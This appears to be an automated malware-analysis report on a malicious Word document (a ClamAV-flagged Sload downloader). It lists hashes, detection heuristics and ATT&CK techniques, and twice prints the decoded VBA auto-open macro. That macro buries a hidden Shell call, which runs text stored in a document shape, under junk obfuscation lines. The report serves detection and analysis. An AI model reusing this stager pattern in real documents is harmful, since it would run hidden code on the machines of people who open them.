Office (OLE) malware analysis — malicious · f412f2f8ea027daa

MALICIOUS

Office (OLE)

79.8 KB Created: 2018-11-07 06:22:00 Authoring application: Microsoft Office Word First seen: 2020-05-14

MD5: 0ea78ad66bc331d435fd8b1f752fad32 SHA-1: 915ad21e967d3cc408e40e944a3a1c582a6e33ce SHA-256: f412f2f8ea027daa62ce65727d12d90fd9220094f2a022e2a3b902371fcb4439

270 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1059.003 Windows Command Shell T1566.001 Spearphishing Attachment

The sample contains a malformed OLE stager with an embedded ZIP payload and VBA macros. The Document_Open macro attempts to execute obfuscated PowerShell commands, which are designed to decompress and execute a second-stage payload. The PowerShell command reconstructs a complex string for execution, likely involving downloading and running further malicious code.

Heuristics 8

ClamAV: Doc.Downloader.Sload-6743946-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sload-6743946-0
Malformed OLE auto-open stager with embedded ZIP payload critical OLE_RAW_MALFORMED_AUTOOPEN_STAGER

Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1187 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1187 bytes
SHA-256: `d896a69ec6987743d61cc09abe171c9d528f2ffec505c8ae17fb42d20ec0ba4f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wnlNlcVKoXP" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next FormatNumber (OBALG + sCTVMH + MzFcVz + PfnVsP) FormatDateTime (hAcPu + ljadIs / ABwmC + BmhdJc + mjOiSr + kUStw) FormatDateTime NhfQjp + TAGVDE + tUFGs + BAhaoO + tDUTzK + OlmFic TimeValue (OSDwt + Rjpwt - ishCL + djaYCR + qADvo + oCbJp) FormatDateTime TiwNHj + dpjqS / VAXSnz + CSwKR * QfjEpp + aSCiw + OXFZv + YIOUua - (PfYBi + wRSiuk) Const VzGwuWaXS = 102268656 - 102268656 Shell@ Shapes(Erfqb + FDkPXGG + 1 + qQlfCWO + lEwGi).TextFrame.TextRange.Text + qmZouhbJ + wSfREho, VzGwuWaXS TimeValue (ZZqwh + rqqDjw + tZjTh + fIpct - ZwHij + JFPRQ) TimeValue DJafE + kLDdr + ikjQW + nTpsw / (XhPZIO + PwGVsT * (GZFzz + GhqkD)) TimeValue sFbIj + pNcREW + dzXBzv + ujEhT / GjiTj + YduWzw + FKCtt + bFDKJi * NLfJB + odZGjJ + czNjbZ + tqKrp + (BszCZ + kZONw) FormatDateTime rLDrkF + nbZGl - APWKkz + hIjjHJ End Sub

SHA-256: d896a69ec6987743d61cc09abe171c9d528f2ffec505c8ae17fb42d20ec0ba4f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "wnlNlcVKoXP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   FormatNumber (OBALG + sCTVMH + MzFcVz + PfnVsP)
   FormatDateTime (hAcPu + ljadIs / ABwmC + BmhdJc + mjOiSr + kUStw)
   FormatDateTime NhfQjp + TAGVDE + tUFGs + BAhaoO + tDUTzK + OlmFic
   TimeValue (OSDwt + Rjpwt - ishCL + djaYCR + qADvo + oCbJp)
   FormatDateTime TiwNHj + dpjqS / VAXSnz + CSwKR * QfjEpp + aSCiw + OXFZv + YIOUua - (PfYBi + wRSiuk)
Const VzGwuWaXS = 102268656 - 102268656
Shell@ Shapes(Erfqb + FDkPXGG + 1 + qQlfCWO + lEwGi).TextFrame.TextRange.Text + qmZouhbJ + wSfREho, VzGwuWaXS
   TimeValue (ZZqwh + rqqDjw + tZjTh + fIpct - ZwHij + JFPRQ)
   TimeValue DJafE + kLDdr + ikjQW + nTpsw / (XhPZIO + PwGVsT * (GZFzz + GhqkD))
   TimeValue sFbIj + pNcREW + dzXBzv + ujEhT / GjiTj + YduWzw + FKCtt + bFDKJi * NLfJB + odZGjJ + czNjbZ + tqKrp + (BszCZ + kZONw)
   FormatDateTime rLDrkF + nbZGl - APWKkz + hIjjHJ
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.